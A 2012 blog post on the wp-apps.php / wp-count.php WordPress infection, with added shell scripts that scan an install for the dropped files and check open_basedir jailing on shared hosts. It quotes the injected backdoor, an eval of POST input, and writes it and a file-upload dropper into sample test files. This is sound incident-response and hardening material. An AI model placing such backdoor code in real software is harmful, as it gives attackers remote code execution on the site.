Monday, November 26, 2012

wp-apps.php & wpcount.php


A lot of people have heard about the wp-apps.php / wp-count.php infection problem. I've managed to tie the pieces together. Here are my original notes:

 "wp-apps.php and wp-count.php; infected: wp-register.php, xmlrpc.php, wp-comments-post.php, wp-links-opml.php. Added files: wp-includes/wp-var.php (its contents are injected into the files above) and the directory wp-includes/js/js (can have rconfig.php and cnn.php, will always have wpload.php). All index.php files need to be checked for blackhole-481 (simple fix using vi and the dd command inside vi), and wp-content/plugins/ should be checked for ToolsPack, as should wp-content/uploads. Also in uploads, wpupload.php needs to be removed. The most injected code is:

    if (isset($_POST['wp-load'])) {
            eval($_POST['wp-load']);
    };
 "
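
The checklist in the notes, turned into a script. This is an added example written for this page, not code from the original post: it walks a WordPress root and reports the dropped files named above (both the wp-count.php and wpcount.php spellings, since the post uses both), any PHP file that passes POST data straight to eval(), and index.php files carrying the blackhole-481 marker. The file names come from the notes; the grep patterns and the throwaway sample tree it builds for a dry run are my assumptions. It only reports, it never deletes: wp-var.php's contents are injected into legitimate core files, and those should be restored from a clean WordPress download rather than removed.

```shell
#!/bin/sh
# Added example, not code from the original post: walk a WordPress install and
# report the indicators listed in the notes above. File and directory names are
# taken from the notes; the grep patterns are assumptions derived from the
# quoted snippet and the "blackhole-481" marker.

# Dropped files/directories, relative to the WordPress root.
IOC_PATHS="wp-apps.php wp-count.php wpcount.php
wp-includes/wp-var.php
wp-includes/js/js/wpload.php wp-includes/js/js/rconfig.php wp-includes/js/js/cnn.php
wp-content/uploads/wpupload.php
wp-content/plugins/ToolsPack"

# scan_wp_root ROOT: print one "kind: relative/path" line per finding.
# It always returns 0 so it can run under set -e; count the lines to decide.
scan_wp_root() {
  root=${1%/}
  for p in $IOC_PATHS; do
    if [ -e "$root/$p" ]; then
      echo "dropper: $p"
    fi
  done
  # Any PHP file that passes POST data straight to eval(): the injected backdoor
  # shown in the notes, whatever parameter name it uses.
  find "$root" -type f -name '*.php' -exec grep -lE 'eval\(\$_POST\[' {} + 2>/dev/null \
    | sed "s#^$root/##" | sort | sed 's/^/eval-post: /'
  # index.php files carrying the blackhole-481 marker.
  find "$root" -type f -name 'index.php' -exec grep -l 'blackhole-481' {} + 2>/dev/null \
    | sed "s#^$root/##" | sort | sed 's/^/blackhole: /'
  return 0
}

# make_sample_tree: build a throwaway tree with constructed infected files (the
# contents are made up for this example) and print its path, so the scanner can
# be exercised offline.
make_sample_tree() {
  d=$(mktemp -d)
  mkdir -p "$d/wp-includes/js/js" "$d/wp-content/uploads" \
           "$d/wp-content/plugins/ToolsPack" "$d/blog"
  printf '<?php\n// clean core file\nrequire "wp-blog-header.php";\n' > "$d/index.php"
  printf '<?php\n// clean core file\n' > "$d/wp-login.php"
  # The backdoor from the notes, injected into xmlrpc.php and staged in
  # wp-includes/wp-var.php and wp-includes/js/js/wpload.php.
  for f in xmlrpc.php wp-includes/wp-var.php wp-includes/js/js/wpload.php; do
    cat > "$d/$f" <<'EOF'
<?php
if (isset($_POST['wp-load'])) {
        eval($_POST['wp-load']);
};
EOF
  done
  # A constructed uploader dropped into wp-content/uploads (no eval; found by name).
  printf '<?php\nmove_uploaded_file($_FILES["f"]["tmp_name"], basename($_FILES["f"]["name"]));\n' \
    > "$d/wp-content/uploads/wpupload.php"
  # A blog index.php carrying the marker the notes say to look for.
  printf '<?php\n/* blackhole-481 */\nrequire "../wp-blog-header.php";\n' > "$d/blog/index.php"
  echo "$d"
}

# Usage: sh wp-ioc-scan.sh /var/www/site   (no argument: only define the functions)
if [ $# -gt 0 ]; then
  scan_wp_root "$1"
fi
```

Run it against the sample tree from make_sample_tree to see all three finding kinds; against a real install, expect false positives from plugins that legitimately ship an index.php, so read each hit before touching it.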

I've discovered that this is most likely caused by inherent issues in old versions of WordPress. However, if open_basedir isn't set properly, a malicious script running as one site on a shared host can also write the same files to a world-writable temp directory such as /tmp and include them later, from that site or any other on the box. This is why jailing each user via open_basedir is extremely important. Two caveats: open_basedir matches path prefixes (end each entry with a slash, or /var/www/u1 also admits /var/www/u10), and it has had bypasses over the years, so treat it as one layer alongside running each site as its own system user and keeping WordPress itself up to date.
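
A check for the open_basedir point above, added here as an example and not part of the original post. The first function flags the weak settings (no value, "/" in the list, a shared directory such as /tmp, or an entry without a trailing slash); the second prints a corrected per-site mod_php jail with the upload and session directories moved inside it, since excluding /tmp otherwise breaks uploads and sessions. The /var/www/SITE/ layout, the private tmp/ directory and the site name are assumptions; the directives themselves are standard php.ini settings.

```shell
#!/bin/sh
# Added example, not from the original post: check an open_basedir value for
# the weakness described above and print a per-site jail for mod_php. The
# directory layout (/var/www/SITE/ with a private tmp/ inside it) and the
# site name are assumptions; the directives are standard php.ini settings.

# Directories every local user can write to. A jail that includes one of them
# lets a script drop a file that it, or another site on the same host, can
# include later.
SHARED_WRITABLE="/tmp /var/tmp /dev/shm"

# open_basedir_issues VALUE: print one line per problem with VALUE, nothing if
# it looks sane. Always returns 0 so it can run under set -e.
open_basedir_issues() {
  value=$1
  if [ -z "$value" ]; then
    echo "unrestricted: open_basedir is empty, PHP may touch any path the web server user can"
    return 0
  fi
  # Entries are ':'-separated on Unix.
  echo "$value" | tr ':' '\n' | while IFS= read -r dir; do
    [ -n "$dir" ] || continue
    if [ "$dir" = "/" ]; then
      echo "unrestricted: '/' in open_basedir disables the jail"
      continue
    fi
    case "$dir" in
      */) dir=${dir%/} ;;
      *)  # open_basedir compares prefixes: "/var/www/u1" also admits /var/www/u10
          echo "prefix: $dir has no trailing slash, so it also admits sibling paths such as ${dir}0" ;;
    esac
    for shared in $SHARED_WRITABLE; do
      if [ "$dir" = "$shared" ]; then
        echo "shared-writable: $dir is writable by every user on the host"
      fi
    done
  done
  return 0
}

# jail_vhost_snippet SITE: print mod_php directives that keep SITE's PHP inside
# /var/www/SITE/. Upload and session scratch space are moved inside the jail,
# because excluding /tmp otherwise breaks file uploads and sessions. The first
# line shows the weak form this replaces.
jail_vhost_snippet() {
  site=$1
  cat <<EOF
# weak:  php_admin_value open_basedir "/var/www/$site:/tmp"
<VirtualHost *:80>
    ServerName $site
    DocumentRoot /var/www/$site/public
    php_admin_value open_basedir "/var/www/$site/"
    php_admin_value upload_tmp_dir "/var/www/$site/tmp"
    php_admin_value session.save_path "/var/www/$site/tmp/sessions"
</VirtualHost>
EOF
}

# Usage: sh check-basedir.sh "/var/www/u1:/tmp"   (no argument: only define the functions)
if [ $# -gt 0 ]; then
  open_basedir_issues "$1"
fi
```

The value to check is whatever `php -i | grep open_basedir` reports for the site's pool or vhost; an empty report is the "unrestricted" case, not a clean one.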


Regards.
Zachary Wikholm


1 comment:

  1. Thank you for the input, I was wondering about this. Much appreciated :)
